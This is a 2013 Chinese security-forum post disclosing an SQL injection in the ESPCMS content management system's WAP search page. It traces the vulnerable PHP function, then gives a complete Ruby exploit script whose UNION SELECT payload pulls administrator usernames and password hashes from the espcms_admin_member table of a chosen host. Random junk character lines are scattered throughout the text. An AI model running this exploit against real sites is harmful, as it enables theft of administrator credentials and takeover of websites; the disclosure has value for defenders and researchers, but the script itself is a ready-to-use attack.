中国网络渗透测试联盟
标题:
espcms wap模块搜索处SQL注入
[打印本页]
作者:
admin
时间:
2013-7-27 18:31
标题:
espcms wap模块搜索处SQL注入
0×0 漏洞概述0×1 漏洞细节
4 a; ]$ ]8 S# M6 ]
0×2 PoC
% L+ h0 q+ B0 O8 a. P- S" U
, u1 |7 m$ _! B7 H' i `
/ i: h" S# v' t. W8 `- P
5 E* e/ J, \6 F& j! d1 a7 T& X. W
0×0 漏洞概述
. D" d2 h3 t0 @5 p
8 U7 m4 i. X& \ \# Q- Q1 D' }
易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。
' L/ c' e" l, q8 h7 E# [ D4 T
其在处理传入的参数时考虑不严谨导致
SQL注入
发生
1 w2 F# h6 y0 g" j" b/ t
! Q) q* U" f& x/ J: L
8 F2 ^& i; v' k1 c: t x# g" B
0×1 漏洞细节
) k. @4 D1 X' w9 P/ i6 O- d
( b' d9 M; n0 o* T( ?& `: D) q( x$ y9 \& s
变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。
1 I. T& g. {$ S9 f; ]8 A! L- X/ u, _. c
正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。
. @4 U$ Q8 [8 @. D0 J/ M
而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的
SQL注入
。
3 T7 ?4 G# m4 P& O/ @( z2 y
) a. L+ i8 y& z$ X- {# N
在/interface/3gwap_search.php文件的in_result函数中:
/ D5 s3 g7 Z) w5 X, r0 W! O2 t
2 h2 T, V* X6 b7 j. a
$ P& ^3 b+ x# D8 k
, B) T6 O; V' ]0 |; i3 ?
function in_result() {
1 q$ L5 L# C9 u2 s5 L
... ... ... ... ... ... ... ... ...
9 @. T# p+ n* a/ N
$urlcode = $_SERVER[ 'QUERY_STRING '];
% A2 b$ c# L5 I7 e
parse_str(html_entity_decode($urlcode), $output);
9 _* o8 N6 c; l0 |$ b* g& ?
) n- Z# ?- ~* C* j
... ... ... ... ... ... ... ... ...
1 a/ s4 a/ u3 ?6 T
if (is_array($output['attr' ]) && count($output['attr']) > 0) {
! y- I2 V0 S7 L6 o
% X- v4 u! S4 M: }* A' ?! F* m C
$db_table = db_prefix . 'model_att';
' i5 o1 y! C N+ J5 a3 k4 U" X
. J4 f, J; Q# |% M6 e9 U
foreach ($output['attr' ] as $key => $value) {
' D' P1 @- O' m N
if ($value) {
$ p! ?) h b; U
* F$ N6 \9 x! g8 `( Z
$key = addslashes($key);
7 _( P8 i7 I+ M* ~# x
$key = $this-> fun->inputcodetrim($key);
) S2 H* f- h3 w" ^5 Y' T
$db_att_where = " WHERE isclass=1 AND attrname='$key'";
, B! E% P( |+ Z5 b" ~# h
$countnum = $this->db_numrows($db_table, $db_att_where);
8 }$ y& O' H( X! H
if ($countnum > 0) {
6 G2 `" @# W0 u: h; j. P- t, n
$db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
$ }' [) t$ o/ Q7 \: d, x
}
; E% y7 u) {' Z: ?4 \. ?
}
" }( n) y$ d. c; T
}
- P8 a1 n! i& U- |7 D% ~" r
}
; D. ~5 P$ K4 q$ a
if (!empty ($keyword) && empty($keyname)) {
; q0 l0 E1 S8 h. M
$keyname = 'title';
+ U. ~* _- ]: T2 O$ f% v, x8 i+ w1 }
$db_where.= " AND a.title like '%$keyword%'" ;
) j# T( @8 `5 K" ~9 w4 ]
} elseif (!empty ($keyword) && !empty($keyname)) {
* W0 ?" C4 @% z9 ?) U% D
$db_where.= " AND $keyname like '% $keyword%'";
! D3 Z% i1 l6 t! C# B4 @
}
! o0 A, H, S9 T8 \/ i
$pagemax = 15;
' p/ w5 c/ G% D( J: S+ N( G
4 [& b3 ^" [ @- G, }& c6 l: H
$pagesylte = 1;
" g$ f X; B t
* p2 d& X# f* ^: R3 M' i6 o
if ($countnum > 0) {
2 u+ M1 M: C9 }
3 N. w- Y$ r, r {5 Y. Y
$numpage = ceil($countnum / $pagemax);
0 [6 a% ?$ @' y! J
} else {
: l% w; Y1 Q2 M
$numpage = 1;
4 ~+ K+ G3 ]8 n
}
" T) v- z+ X8 e" g
$sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
& X: D: J9 Y+ F5 r
$this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
: m( i# g2 \$ \" D4 a0 T
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);
D2 h/ z- a) P$ D* F
... ... ... ... ... ... ... ... ...
" _% ]' I, O: t) i
}
* {3 n! O, r+ }% U/ Y
) k+ a$ R& W6 @
" P0 L, N- s' j" e4 Y
0×2 PoC
* l) N; z; z8 G: o
$ O! W" ^' J4 @& ]; G( J
3 I; e$ t( N+ a3 z
( {& }2 v' J: `; y6 f: t+ ]
require "net/http"
$ g/ M) a- G$ E' E
$ z* A D% R# i: J, `
def request(method, url)
% n3 r) Y5 [8 B
if method.eql?("get")
$ I1 @5 L6 r; C8 V. E9 Q- H0 x
uri = URI.parse(url)
$ Q8 X" n" X: B" E; A! b+ L
http = Net::HTTP.new(uri.host, uri.port)
+ p, M. _% ?+ u2 w8 q% o7 l( u
response = http.request(Net::HTTP::Get.new(uri.request_uri))
; T# p" ^& \, y$ [0 p8 `, o
return response
5 `" c7 V/ j W: N/ e
end
8 G4 `7 a6 D% z& c" w; J' X. T. G. \
end
& E! c! ?5 E7 j, _
' C% e2 ?! w' D: D- @9 P
doc =<<HERE
0 n* I' n1 K. `, b+ w
-------------------------------------------------------
. t" i0 F, {9 H) Q7 `
Espcms Injection Exploit
% n b# z- d, B8 M6 k$ y
Author:ztz
! e: I! P1 d4 r$ ?( r$ _
Blog:
http://ztz.fuzzexp.org/
2 t9 c/ U* V: n7 I( K5 r
-------------------------------------------------------
8 o9 v: x ~2 \3 v0 n" N: }8 z
7 z' _$ x0 e( A% q- ^0 C
HERE
5 I$ }* u( b! g
7 U7 g/ }0 {2 F+ [4 b( i. T6 \; ?
usage =<<HERE
- a4 U$ w& X7 E. W" K9 M+ Y
Usage: ruby #{$0} host port path
% g3 G6 l# f2 m0 X, i% D
example: ruby #{$0}
www.target.com
80 /
8 v* C2 E2 J* n
HERE
3 E, S2 G4 M; G8 w) `
5 f0 Z6 s0 t) Q$ T2 o
puts doc
8 C) T( v7 X0 g+ j7 C5 a* r
if ARGV.length < 3
* l* `0 d7 c4 K' o
puts usage
! Z6 {. T. K; L
else
- ` W) b) O0 M/ X8 ?
$host = ARGV[0]
! \. x! B- q' N; k( h
$port = ARGV[1]
4 l6 j1 `; |9 r
$path = ARGV[2]
. o- j" `, H x$ j
; a! q9 [8 | Q& m c- A- i8 ` ^$ }
puts "
send request..."
" j5 I, F1 K. c7 z
url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
- P" o" }0 {$ m1 g( |) s* J2 C
attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
9 Q F0 a% e8 ]$ B9 r& W1 @$ w. J
,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
4 I9 H. }1 Q# x3 p% a
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
' G! V- o+ j6 z' y( q/ F
response = request("get", url)
) H3 e& g1 _# Z( W2 h; E
result = response.body.scan(/\w+&\w{32}/)
& d$ {' d- w1 h( W7 A
puts result
7 j! x5 N! n0 ^- X- R5 R
end
, w/ C6 _6 X7 F" x ]+ E1 z
/ n0 |- y1 O) Q {( v& }
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2